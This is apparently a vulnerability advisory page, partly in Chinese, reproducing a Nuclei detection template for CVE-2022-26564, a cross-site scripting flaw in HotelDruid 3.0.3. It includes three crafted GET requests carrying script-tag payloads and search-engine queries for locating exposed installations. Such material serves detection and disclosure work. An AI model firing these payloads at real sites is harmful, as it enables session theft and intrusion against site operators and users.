CVE-2022-26564: HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: HotelDruid | POC: 已公开

漏洞描述

HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.

PoC代码[已公开]

id: CVE-2022-26564

info:
  name: HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting
  author: alexrydzak
  severity: medium
  description: |
    HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://rydzak.me/2022/04/cve-2022-26564/
    - https://www.hoteldruid.com
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26564
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-26564
    cwe-id: CWE-79
    epss-score: 0.00684
    epss-percentile: 0.70816
    cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: digitaldruid
    product: hoteldruid
    shodan-query:
      - http.favicon.hash:-1521640213
      - http.title:"hoteldruid"
    fofa-query:
      - title="hoteldruid"
      - icon_hash=-1521640213
    google-query: intitle:"hoteldruid"
  tags: cve,cve2022,hoteldruid,xss,digitaldruid

http:
  - method: GET
    path:
      - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>'
      - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1'
      - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>javascript:alert('XSS')</script>"
          - "HotelDruid"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402207dee7552e32b7984f9d5e07da9f7d54d8f866dae1c909765bf74868c2fc3e97802204e33576cbb14a464907319da1e95248ae800ef35fbdbc370bed9d5c8ba2993ed:922c64590222798bb761d5b6d8e72950

相关漏洞推荐